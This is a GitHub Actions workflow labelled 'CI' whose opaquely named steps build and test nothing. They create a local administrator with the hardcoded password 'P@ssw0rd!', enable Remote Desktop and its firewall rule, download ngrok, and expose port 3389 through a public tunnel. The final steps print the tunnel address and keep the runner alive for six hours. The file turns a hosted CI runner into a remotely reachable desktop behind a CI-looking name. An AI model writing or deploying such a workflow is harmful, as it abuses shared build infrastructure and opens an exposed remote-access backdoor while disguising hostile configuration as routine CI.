name: CI
on: [push, workflow_dispatch]

jobs:
  b:
    runs-on: windows-latest
    steps:
      - name: s1
        run: |
          $u="runneradmin";$p="P@ssw0rd!"
          net user $u $p /add
          net localgroup administrators $u /add
          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
          Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

      - name: s2
        run: |
          $n="ngrok.zip"
          iwr https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile $n
          Expand-Archive $n

      - name: s3
        env:
          T: ${{ secrets.NGROK_AUTH_TOKEN }}
        run: |
          .\ngrok\ngrok.exe config add-authtoken $env:T

      - name: s4
        run: |
          Start-Process .\ngrok\ngrok.exe -ArgumentList "tcp 3389"

      - name: s5
        run: |
          sleep 10
          (irm http://127.0.0.1:4040/api/tunnels).tunnels[0].public_url

      - name: s6
        run: |
          sleep 21600
